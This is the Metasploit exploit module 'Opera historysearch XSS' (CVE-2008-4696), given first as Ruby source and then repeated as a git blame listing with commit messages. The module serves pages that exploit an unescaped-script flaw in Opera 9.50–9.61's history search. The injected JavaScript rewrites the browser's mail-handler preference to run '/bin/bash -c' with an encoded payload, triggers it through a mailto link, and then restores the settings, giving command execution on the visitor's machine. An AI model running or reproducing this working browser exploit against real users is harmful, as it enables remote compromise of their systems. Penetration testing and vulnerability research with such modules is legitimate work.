metasploit-framework/modules/exploits/multi/browser/opera_historysearch.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({
  #  :ua_name    => HttpClients::OPERA,
  #  :javascript => true,
  #  :rank       => ExcellentRanking, # reliable command execution
  #  :vuln_test  => %Q{
  #    v = parseFloat(opera.version());
  #    if (9.5 < v && 9.62 > v) {
  #      is_vuln = true;
  #    }
  #  },
  #})

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Opera historysearch XSS',
      'Description'    => %q{
          Certain constructs are not escaped correctly by Opera's History
        Search results.  These can be used to inject scripts into the
        page, which can then be used to modify configuration settings
        and execute arbitrary commands.  Affects Opera versions between
        9.50 and 9.61.
      },
      'License'        => BSD_LICENSE,
      'Author'         =>
        [
          'Roberto Suggi', # Discovered the vulnerability
          'Aviv Raff <avivra[at]gmail.com>', # showed it to be exploitable for code exec
          'egypt',  # msf module
        ],
      'References'     =>
        [
          ['CVE',    '2008-4696'],
          ['OSVDB',  '49472'],
          ['BID',    '31869'],
          ['URL',    'http://www.opera.com/support/kb/view/903/'],
        ],
      'Payload'        =>
        {
          'EXITFUNC' => 'process',
          'Space'    => 4000,
          'DisableNops' => true,
          'BadChars' => "\x09\x0a\x0d\x20",
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby telnet',
            }
        },
      'Platform'       => %w{ unix },
      'Targets'        =>
        [
          #[ 'Automatic', {  } ],
          #[ 'Opera < 9.61 Windows',
          #	{
          #		'Platform' => 'win',
          #		'Arch' => ARCH_X86,
          #	}
          #],
          [ 'Opera < 9.61 Unix Cmd',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
            }
          ],
        ],
      'DisclosureDate' => 'Oct 23 2008', # Date of full-disclosure post showing code exec
      'DefaultTarget'  => 0
      ))
  end

  def on_request_uri(cli, request)

    headers = {}
    html_hdr = %Q^
      <html>
      <head>
      <title>Loading</title>
      ^
    html_ftr = %Q^
      </head>
      <body >
      <h1>Loading</h1>
      </body></html>
      ^

    case request.uri
    when /[?]jspayload/
      p = regenerate_payload(cli)
      if (p.nil?)
        send_not_found(cli)
        return
      end
      # We're going to run this through unescape(), so make sure
      # everything is encoded
      penc = Rex::Text.to_hex(p.encoded, "%")
      content =
        %Q{
          var s = document.createElement("iframe");

          s.src="opera:config";
          s.id="config_window";
          document.body.appendChild(s);
          config_window.eval(
            "var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
            "old_app = opera.getPreference('Mail','External Application');" +
            "old_handler = opera.getPreference('Mail','Handler');" +
            "opera.setPreference('Mail','External Application',cmd);" +
            "opera.setPreference('Mail','Handler','2');" +
            "app_link = document.createElement('a');" +
            "app_link.setAttribute('href', 'mailto:a@b.com');" +
            "app_link.click();" +
            "setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
            "setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
          "");
          setTimeout(function () {window.location='about:blank'},1);
        }

    when /[?]history/
      js = %Q^
        window.onload = function() {
          location.href = "opera:historysearch?q=*";
        }
        ^
      content = %Q^
        #{html_hdr}
        <script><!--
        #{js}
        //--></script>
        #{html_ftr}
        ^
    when get_resource()
      print_status("Sending #{self.name} for request #{request.uri}")

      js = %Q^
        if (window.opera) {
          var wnd = window;
          while (wnd.parent != wnd) {
            wnd = wnd.parent;
          }
          url = location.href;
          wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
        }
        ^
      content = %Q^
        #{html_hdr}
        <script><!--
        #{js}
        //--></script>
        #{html_ftr}
        ^
    else
      print_status("Sending 404 for request #{request.uri}")
      send_not_found(cli)
      return
    end
    content.gsub!(/^ {8}/, '')
    content.gsub!(/\t/, ' ')

    send_response_html(cli, content, headers)
    handler(cli)
  end

end
add Opera historysearch module; works on linux, windows will come later git-svn-id: file:///home/svn/framework3/trunk@6777 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-13 07:48:12 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add Opera historysearch module; works on linux, windows will come later git-svn-id: file:///home/svn/framework3/trunk@6777 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-13 07:48:12 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`
add Opera historysearch module; works on linux, windows will come later git-svn-id: file:///home/svn/framework3/trunk@6777 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-13 07:48:12 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpServer::HTML`
add Opera historysearch module; works on linux, windows will come later git-svn-id: file:///home/svn/framework3/trunk@6777 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-13 07:48:12 +00:00
Reduce number of modules available on BrowserAutopwn 2013-11-12 18:37:29 +00:00			`#include Msf::Exploit::Remote::BrowserAutopwn`
			`#autopwn_info({`
			`# :ua_name => HttpClients::OPERA,`
			`# :javascript => true,`
			`# :rank => ExcellentRanking, # reliable command execution`
			`# :vuln_test => %Q{`
			`# v = parseFloat(opera.version());`
			`# if (9.5 < v && 9.62 > v) {`
			`# is_vuln = true;`
			`# }`
			`# },`
			`#})`
merge browser_autopwn back into trunk. This changes the database schema slightly, so make sure to db_destroy and db_create before using the database features. git-svn-id: file:///home/svn/framework3/trunk@6873 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-22 20:14:35 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Opera historysearch XSS',`
			`'Description' => %q{`
			`Certain constructs are not escaped correctly by Opera's History`
			`Search results. These can be used to inject scripts into the`
			`page, which can then be used to modify configuration settings`
			`and execute arbitrary commands. Affects Opera versions between`
			`9.50 and 9.61.`
			`},`
			`'License' => BSD_LICENSE,`
			`'Author' =>`
			`[`
			`'Roberto Suggi', # Discovered the vulnerability`
Fix email format 2014-07-11 17:45:23 +00:00			`'Aviv Raff <avivra[at]gmail.com>', # showed it to be exploitable for code exec`
Retab modules 2013-08-30 21:28:54 +00:00			`'egypt', # msf module`
			`],`
			`'References' =>`
			`[`
			`['CVE', '2008-4696'],`
			`['OSVDB', '49472'],`
			`['BID', '31869'],`
			`['URL', 'http://www.opera.com/support/kb/view/903/'],`
			`],`
			`'Payload' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`'Space' => 4000,`
			`'DisableNops' => true,`
			`'BadChars' => "\x09\x0a\x0d\x20",`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic perl ruby telnet',`
			`}`
			`},`
Bug #8419 - Added platform info missing on exploits 2013-10-09 02:41:50 +00:00			`'Platform' => %w{ unix },`
Retab modules 2013-08-30 21:28:54 +00:00			`'Targets' =>`
			`[`
			`#[ 'Automatic', { } ],`
			`#[ 'Opera < 9.61 Windows',`
			`# {`
			`# 'Platform' => 'win',`
			`# 'Arch' => ARCH_X86,`
			`# }`
			`#],`
			`[ 'Opera < 9.61 Unix Cmd',`
			`{`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`}`
			`],`
			`],`
			`'DisclosureDate' => 'Oct 23 2008', # Date of full-disclosure post showing code exec`
			`'DefaultTarget' => 0`
			`))`
			`end`
add Opera historysearch module; works on linux, windows will come later git-svn-id: file:///home/svn/framework3/trunk@6777 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-13 07:48:12 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def on_request_uri(cli, request)`
add Opera historysearch module; works on linux, windows will come later git-svn-id: file:///home/svn/framework3/trunk@6777 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-13 07:48:12 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`headers = {}`
			`html_hdr = %Q^`
			`<html>`
			`<head>`
			`<title>Loading</title>`
			`^`
			`html_ftr = %Q^`
			`</head>`
			`<body >`
			`<h1>Loading</h1>`
			`</body></html>`
			`^`
add Opera historysearch module; works on linux, windows will come later git-svn-id: file:///home/svn/framework3/trunk@6777 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-13 07:48:12 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`case request.uri`
			`when /[?]jspayload/`
			`p = regenerate_payload(cli)`
			`if (p.nil?)`
			`send_not_found(cli)`
			`return`
			`end`
			`# We're going to run this through unescape(), so make sure`
			`# everything is encoded`
			`penc = Rex::Text.to_hex(p.encoded, "%")`
			`content =`
			`%Q{`
			`var s = document.createElement("iframe");`
revert overzealous commit git-svn-id: file:///home/svn/framework3/trunk@6961 4d416f70-5f16-0410-b530-b9f4589650da 2009-08-18 04:53:35 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`s.src="opera:config";`
			`s.id="config_window";`
			`document.body.appendChild(s);`
			`config_window.eval(`
			`"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +`
			`"old_app = opera.getPreference('Mail','External Application');" +`
			`"old_handler = opera.getPreference('Mail','Handler');" +`
			`"opera.setPreference('Mail','External Application',cmd);" +`
			`"opera.setPreference('Mail','Handler','2');" +`
			`"app_link = document.createElement('a');" +`
			`"app_link.setAttribute('href', 'mailto:a@b.com');" +`
			`"app_link.click();" +`
			`"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +`
			`"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +`
			`"");`
			`setTimeout(function () {window.location='about:blank'},1);`
			`}`
revert overzealous commit git-svn-id: file:///home/svn/framework3/trunk@6961 4d416f70-5f16-0410-b530-b9f4589650da 2009-08-18 04:53:35 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`when /[?]history/`
			`js = %Q^`
			`window.onload = function() {`
			`location.href = "opera:historysearch?q=*";`
			`}`
			`^`
			`content = %Q^`
			`#{html_hdr}`
			`<script><!--`
			`#{js}`
			`//--></script>`
			`#{html_ftr}`
			`^`
			`when get_resource()`
			`print_status("Sending #{self.name} for request #{request.uri}")`
add Opera historysearch module; works on linux, windows will come later git-svn-id: file:///home/svn/framework3/trunk@6777 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-13 07:48:12 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`js = %Q^`
			`if (window.opera) {`
			`var wnd = window;`
			`while (wnd.parent != wnd) {`
			`wnd = wnd.parent;`
			`}`
			`url = location.href;`
			`wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";`
			`}`
			`^`
			`content = %Q^`
			`#{html_hdr}`
			`<script><!--`
			`#{js}`
			`//--></script>`
			`#{html_ftr}`
			`^`
			`else`
			`print_status("Sending 404 for request #{request.uri}")`
			`send_not_found(cli)`
			`return`
			`end`
Make gsubs compliant with the new indentation standard 2013-12-31 17:06:53 +00:00			`content.gsub!(/^ {8}/, '')`
Retab modules 2013-08-30 21:28:54 +00:00			`content.gsub!(/\t/, ' ')`
add Opera historysearch module; works on linux, windows will come later git-svn-id: file:///home/svn/framework3/trunk@6777 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-13 07:48:12 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`send_response_html(cli, content, headers)`
			`handler(cli)`
			`end`
add Opera historysearch module; works on linux, windows will come later git-svn-id: file:///home/svn/framework3/trunk@6777 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-13 07:48:12 +00:00
			`end`